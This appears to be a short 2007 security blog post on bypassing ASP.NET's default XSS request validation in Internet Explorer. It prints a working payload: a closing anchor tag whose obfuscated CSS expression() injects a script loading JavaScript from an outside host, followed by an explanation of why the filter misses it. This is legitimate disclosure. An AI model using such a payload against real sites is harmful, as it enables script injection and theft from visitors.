---
layout: post
status: publish
published: true
title: Bypass ASP.NET XSS Protection in Internet Explorer

wordpress_id: 290
wordpress_url: http://pro.grammatic.org/post-bypass-aspnet-xss-protection-in-internet-explorer-8.aspx
date: !binary |-
  MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA==
date_gmt: !binary |-
  MjAwNy0wNS0xNSAxNDowMzoyNCArMDIwMA==
categories:
- Technology
- InfoSec
- .NET
tags:
- information security
- .NET
comments: []
---
<p>ASP.NET comes preloaded with some default XSS protection which is actually pretty nifty. However, it turns out that the system can be circumvented by a variety of methods, as illustrated by this test input:</p>

{% highlight html %}
	</a style="xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://www.site.com/JS.js')">
{% endhighlight %}

<p>Turns out that IE will still process attributes on closing tags which circumvents the filter for &lt;a whilst also treating /**/ as a null comment but obviously breaking .NET's filter regex. Thanks to Hong @ <a href="http://sla.ckers.org/forum/read.php?2,7462,8409%23msg-8409">sla.ckers</a>.</p>